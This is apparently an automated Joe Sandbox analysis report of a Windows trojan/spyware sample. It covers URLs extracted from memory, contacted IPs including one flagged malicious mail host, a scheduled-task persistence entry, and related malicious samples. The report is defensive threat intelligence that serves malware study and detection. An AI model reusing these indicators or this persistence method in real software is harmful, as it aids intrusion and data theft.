Name: http://www.jiyu-kobo.co.jp/H-u
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.fontbureau.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.galapagosdesign.com/
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.comF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://mail.strictfacilityservices.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.jiyu-kobo.co.jp/P
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.jiyu-kobo.co.jp/;-
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.fontbureau.comdf
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.fontbureau.comcomt
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.jiyu-kobo.co.jp/jp/
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.comd
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273916785.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.carterandcone.coml
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.urwpp.deeg
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.fontbureau.comd&-c
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low
Name: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.com/designers/frere-jones.html
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.fontbureau.comoitu
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.jiyu-kobo.co.jp/t
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.com/designers/cabarga.html
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272325014.0000000005A46000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.zhongyicts.com.cno.
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265582317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high
Name: http://www.jiyu-kobo.co.jp/&-c
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.jiyu-kobo.co.jp/jp/--
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.jiyu-kobo.co.jp/_-l
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
Name: http://www.fontbureau.comE.TTF
Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown
Name: https://OPBeIPZ8XbJqLOvY6X.net
Source: nrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
3.232.242.170 | unknown | United States | 14618 | AMAZON-AESUS | false
111.118.212.38 | strictfacilityservices.com | India | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
52.20.78.240 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 756116
Start date and time: 2022-11-29 16:49:16 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 47s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/5@8/3
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 23
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
Time | Type | Description
16:50:37 | API Interceptor | 432x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe modified
16:50:45 | Task Scheduler | Run new task: nrQtAokXKaSn path: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
16:51:22 | API Interceptor | 69x Sleep call for process: nrQtAokXKaSn.exe modified
Match: 3.232.242.170
Associated Sample Name / URL | Detection | Context
library_2.exe | malicious | api.ipify.org/?format=xml
271-20221017-86198_98-WS-271-171022151632006-3030-1.exe | malicious | api.ipify.org/
#U041f#U043b#U0430#U0449#U0430#U043d#U0435.exe | malicious | api.ipify.org/
d616314c.exe | malicious | api.ipify.org/
SecuriteInfo.com.Win32.Malware-gen.21488.exe | malicious | api.ipify.org/
SecuriteInfo.com.NSIS.Injector.AOW.tr.23479.exe | malicious | api.ipify.org/
SecuriteInfo.com.IL.Trojan.MSILZilla.16636.8959.exe | malicious | api.ipify.org/
GxsZM5JTef.dll | malicious | api.ipify.org/
48oiMWySgT.dll | malicious | api.ipify.org/
P8F24RBu0U.doc | malicious | api.ipify.org/
J09ndcF0J1.doc | malicious | api.ipify.org/
s2205K1342.doc | malicious | api.ipify.org/
if.bin.dll | malicious | api.ipify.org/
w3342l2579.doc | malicious | api.ipify.org/
if.dll | malicious | api.ipify.org/
if.dll | malicious | api.ipify.org/
if.dll | malicious | api.ipify.org/
mixshop_20211229-065147.exe | malicious | api.ipify.org/?format=xml
FAB2BBA2.doc | malicious | api.ipify.org/
iff.bin.dll | malicious | api.ipify.org/
Match: api.ipify.org.herokudns.com
Associated Sample Name / URL | Detection | Context
SHIPMENT DOCUMENTS.exe | malicious | 52.20.78.240
SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exe | malicious | 52.20.78.240
MACHINE SPECIFICATIONS.exe | malicious | 3.220.57.224
SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe | malicious | 54.91.59.199
MEPS-42.exe | malicious | 3.232.242.170
ORDER.exe | malicious | 52.20.78.240
SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe | malicious | 52.20.78.240
DHJ59300948.xls | malicious | 3.232.242.170
Quotation.exe | malicious | 54.91.59.199
Cg7vRuVKhI.exe | malicious | 3.232.242.170
SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe | malicious | 3.232.242.170
Wzf4gWTOC2.exe | malicious | 3.220.57.224
SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exe | malicious | 54.91.59.199
SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe | malicious | 3.232.242.170
SecuriteInfo.com.Win32.PWSX-gen.25304.17510.exe | malicious | 52.20.78.240
SecuriteInfo.com.BackDoor.SpyBotNET.25.24486.13932.exe | malicious | 54.91.59.199
buH9VrC1dQ.exe | malicious | 54.91.59.199
PO-08784 xlsx.vbe | malicious | 54.91.59.199
KWIR000714988.exe | malicious | 54.91.59.199
Attach Qoute.exe | malicious | 54.91.59.199
Match: AMAZON-AESUS
Associated Sample Name / URL | Detection | Context
http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3D | malicious | 34.226.96.6
robinbot_sample2 | malicious | 3.84.38.38
SHIPMENT DOCUMENTS.exe | malicious | 52.20.78.240
https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652 | malicious | 54.204.125.248
robinbot | malicious | 34.229.40.203
robinbot | malicious | 34.229.40.203
SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exe | malicious | 52.20.78.240
http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2 | malicious | 35.168.94.234
MACHINE SPECIFICATIONS.exe | malicious | 3.220.57.224
SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe | malicious | 54.91.59.199
MEPS-42.exe | malicious | 3.220.57.224
ORDER.exe | malicious | 52.20.78.240
SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe | malicious | 52.20.78.240
DHJ59300948.xls | malicious | 3.232.242.170
Quotation.exe | malicious | 3.220.57.224
Cg7vRuVKhI.exe | malicious | 3.232.242.170
SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe | malicious | 3.232.242.170
Wzf4gWTOC2.exe | malicious | 3.220.57.224
SecuriteInfo.com.W32.MSIL_Kryptik.ILD.gen.Eldorado.12870.1146.exe | malicious | 54.91.59.199
SecuriteInfo.com.Win32.PWSX-gen.7585.24753.exe | malicious | 3.232.242.170
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Context
SHIPMENT DOCUMENTS.exe | malicious | 3.232.242.170, 52.20.78.240
file.exe | malicious | 3.232.242.170, 52.20.78.240
SkyNet.1448.exe | malicious | 3.232.242.170, 52.20.78.240
SkyNet.1448.exe | malicious | 3.232.242.170, 52.20.78.240
